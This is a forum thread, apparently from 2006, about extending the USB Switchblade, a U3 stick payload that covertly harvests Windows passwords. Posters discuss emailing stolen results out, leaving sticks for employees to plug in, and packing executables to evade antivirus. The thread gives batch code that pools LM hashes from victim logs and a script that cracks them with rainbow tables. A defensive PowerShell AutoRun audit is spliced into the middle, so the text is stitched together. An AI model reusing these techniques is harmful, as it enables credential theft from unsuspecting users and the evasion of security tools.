USB Switchblade Development


Darren Kitchen

Something that would be really interesting is having this work even if autorun is enabled, by exploiting the USB to either enable temporarily or just run this code. A lot of places are now preventing the autorun feature for fear of things like this. I'd be interested to see / help with that solution.
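The AutoRun restriction this post refers to is an ordinary Windows registry policy, so a defender can audit it without waiting for a demonstration. As an added example (not code from this thread or from the Switchblade project), the PowerShell below reads the NoDriveTypeAutoRun value from the machine and user policy hives, reports whether the removable-drive and CD-ROM bits are set, and can enforce 0xFF; the function names Get-AutoRunPolicy and Set-AutoRunPolicy are my own. The CD-ROM bit matters here because a U3 stick exposes its launcher partition as an emulated CD-ROM, so a policy that only covers removable drives does not cover it.

```powershell
# Added example (not from the thread). Audits and optionally enforces the AutoRun
# policy that blocks the autorun.inf launch vector discussed in this thread.
# NoDriveTypeAutoRun is a bitmask of drive types on which AutoRun is disabled:
#   0x04 = removable drives, 0x20 = CD-ROM drives (a U3 stick's launcher partition
#   presents itself as a CD-ROM), 0xFF = every drive type.
$PolicyPaths = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
)
$ValueName = 'NoDriveTypeAutoRun'
$Desired   = 0xFF

function Get-AutoRunPolicy {
    # Report the current value per hive and whether it covers removable and CD-ROM media.
    foreach ($path in $PolicyPaths) {
        $current = (Get-ItemProperty -Path $path -Name $ValueName -ErrorAction SilentlyContinue).$ValueName
        $display = if ($null -eq $current) { 'not set' } else { '0x{0:X2}' -f $current }
        [pscustomobject]@{
            Hive             = $path
            Value            = $display
            RemovableBlocked = ($null -ne $current) -and (($current -band 0x04) -ne 0)
            CdRomBlocked     = ($null -ne $current) -and (($current -band 0x20) -ne 0)
            Compliant        = ($current -eq $Desired)
        }
    }
}

function Set-AutoRunPolicy {
    # Write 0xFF into both hives; the HKLM hive needs an elevated shell.
    foreach ($path in $PolicyPaths) {
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        New-ItemProperty -Path $path -Name $ValueName -PropertyType DWord -Value $Desired -Force | Out-Null
    }
}

Get-AutoRunPolicy | Format-Table -AutoSize
# Uncomment to enforce the policy on this machine:
# Set-AutoRunPolicy
```

Run the audit first; a value that is "not set" or lacks the 0x20 bit is the condition the thread is exploiting. Group Policy (the same Explorer policy key) is the usual way to roll the value out fleet-wide rather than per machine.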


I'd love to see it expanded so that it can email or somehow send the results to a user-specified destination, just for use in penetration testing. Leave a few USB sticks around a company and just wait for the users to pick them up and plug them in. Great example to convince companies to quit allowing their users administrative privileges.

Either the U3 version or Amish's version would be satisfactory. Anyone know how to do that?


File sharing is enabled, and even with the firewall and anti-virus turned off I'm still getting the same errors. It seems to work great pulling all of my passwords from applications, but it won't even generate the hash to run against rainbow.

Perhaps there is no password on the admin account. In that instance Windows would force remote users to log on using the guest account.


Hey man I feel famous LOL. Seriously thanks for the credit Darren. 8)

When I developed the first payload it was just a proof of concept put together in half an hour as soon as I found out how to replace the U3 ISO. Anyway, since then I have written some more and refined it a bit. I also have a bolt-on that silently finds the local SMTP server (or builds its own if directly connected) and emails the results.

So if you guys want to help develop it further I'm up for it. And if you need help getting it running then just ask :).

I also have a non-U3 version, something like Amish's, that I could add if you need it.

That would be great... would this be something that copies all the required files to the HD then emails from there? I'm thinking that so I won't have to be at the local computer any longer than needs be.


Nice, how do you encrypt exes?

Secret :X I don't give it out for fear of it becoming public and caught by AVs. I WILL ENCRYPT THEM BUT I WON'T GIVE OUT THE ENCRYPTER. Sorry. It would also allow any blackhat-wannabe to hack people. I'm not going to let that happen.


Avast doesn't like it :(

and wigs out


What files? Please email me at admin@vertex-hosting.net with the files it flags. I will encrypt them. I have encrypted pwdump.exe, lsaext.dll and pwservice and they are hosted at http://brainkill.net/hack. Consult the page for direct links.

Thanks

I think I can guess how :P

I'll do a quick check. That message was just immediately while downloading (the on-access scanner).

But I'll disable it and manually test each file separately and send you the results :wink:


OK, so here's Avast's output and the warning/info/advice it gives.

It gives the following warnings for the following files:

file : batexemailpv.exe[uPX]

Malware name : Win32:MailPassView [Tool]

Malware type : Other potentially dangerous program

VPS version : 0636-1, 06/09/2006

recommended action : move to chest

file : batexemspass.exe[uPX]

Malware name : Win32:Messen [Tool]

Malware type : Other potentially dangerous program

VPS version : 0636-1, 06/09/2006

recommended action : move to chest


I must have the original programs, before they were packed with UPX, in order to encrypt them fully. Thanks


Hey all,

The Symantec anti-virus auto-protect is showing up. I used brainkill's version of pwdump and pwservice.exe and LsaExt.dll. I have no problems with pwservice or pwdump, but LsaExt.dll is getting auto-quarantined. Pspv.exe is getting nailed as well. The good news is that I got mspass.exe working and it logs chat user/pass combos in plaintext. I plan on adding Outlook and other mail support as well. Any suggestions for LsaExt.dll and pspv.exe? TIA

Marla :zombie:


I asked on Digg, but didn't get an answer so I am asking at the source.

Is there a particular reason why the U3 ISO image is being replaced with a custom ISO image?

Since the U3 launchpad is a real application (backed by big corporations, so antivirus is much less likely to block it), which already has the ability to autolaunch an application registered to it, why not go that route? All it takes is the U3 developer API (available for free), some tweaking to an exe to behave as U3 expects, and packing it up as a U3 install file. To prevent easy tagging by antivirus, randomly pad the exe before creating the U3 install file. Since U3 always had the ability to load up from a local U3 install file, this is relatively easy to test.

I realize a lot of batch files are being used, but a simple exe to execute batch files shouldn't be a problem, right?

I don't see a clear advantage to using the custom ISO. Am I missing something?


I was thinking that too. I like my skype! dammit! and sudoku. and trillian. and firefox. and thunderbird, etc

I like your idea

EDIT: It also seems lots cleaner to just use the original interface, with a package.


A small modification can be made that will allow someone to easily create a file of LM password hashes alongside the usual machine output.

The benefit? Well, let's say someone wanted to go to several computers and grab a long list of passwords to crack in one fell swoop. Copying and pasting from all of the individual log files to create an LM hash list would be tedious, so why not create it on the fly?

Edit your Switchblade batch file so that at the bottom you see this. Also note that your Switchblade file might not have the URL history, depending on the version you chose. Pay attention to the line that starts with TYPE.

... [continued from file] ...



Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

echo ***********[Dump URL History]******* >> Documentslogfiles%computername%.log 2>&1

Echo ************************************ >> Documentslogfiles%computername%.log 2>&1

   cscript //nologo .DUH.vbs >> Documentslogfiles%computername%.log 2>&1

TYPE Documentslogfiles%computername%.log | find ":::" | find /V "NO PASSWORD" | find /V "HelpAssistant" >> Documentslogfilespwfile.txt

:End

exit

Pay special attention to the line that starts with TYPE. Let's go through it piece by piece.

TYPE Documents\logfiles\%computername%.log

This will get the output we just created with switchblade, so we can work with it.

find ":::"

I noticed all of the LM hashes had three colons in their lines, which appeared nowhere else. Might as well use that to our advantage!

find /V "NO PASSWORD" | find /V "HelpAssistant"

There are two types of lines that we don't want to see: ones that have no password to crack, and those that belong to the Microsoft-created account "HelpAssistant". If there are other search terms you don't want to see, you can add them also.

>> Documents\logfiles\pwfile.txt

This will create a password file if it doesn't exist. If it does exist, the password file will be appended to, so that you can rapidly gather passwords into one file for quick cracking, which can be done with the next small code edit.

Making rcrack one-click friendly

Use Notepad to create the following file, and save it as crack.bat or something with a batch extension. This will be saved on your cracking computer at home that contains your rainbow tables. Hopefully you don't bring those with you on your USB key!!! :o

@echo off
echo Starting crack, writing output to log.txt ...
REM "echo." writes an empty line; a bare "echo" would write "ECHO is off." into the log
echo. >> log.txt
echo ************************************ >> log.txt
echo Cracking started by %username% at %date% %time% >> log.txt
rcrack.exe *.rt -f pwfile.txt >> log.txt
echo Cracking complete at %date% %time% >> log.txt
echo ************************************ >> log.txt
echo Success!

This batch file will process the password file you created and output its status to log.txt in your cracking folder. This way you can leave your computer cracking unattended and still get the results later in an organized manner, with all of the passwords you gathered in one neat and convenient location.


Since we are on the subject of "physical" access to someone's box and some utilities to use, why not use "Hiren's Boot CD"? A very powerful, yet simple array of tools all tossed into a nice little neat package.

I know it's off subject and it's a very "nubish" utility, yet it works and has a bunch of great tools which I use on a daily basis. Although it doesn't crack the password and give you the hash, it will reset the password for you with a few keyboard strokes. Badda-bing badda-boom, you're in the box with Administrator access.

I have not yet found a Windows machine it doesn't work on. The only drawback would be if someone has a CMOS/BIOS password on the box; you wouldn't be able to access the BIOS without providing a password or removing the battery to reset the BIOS back to default settings.

Just a thought...
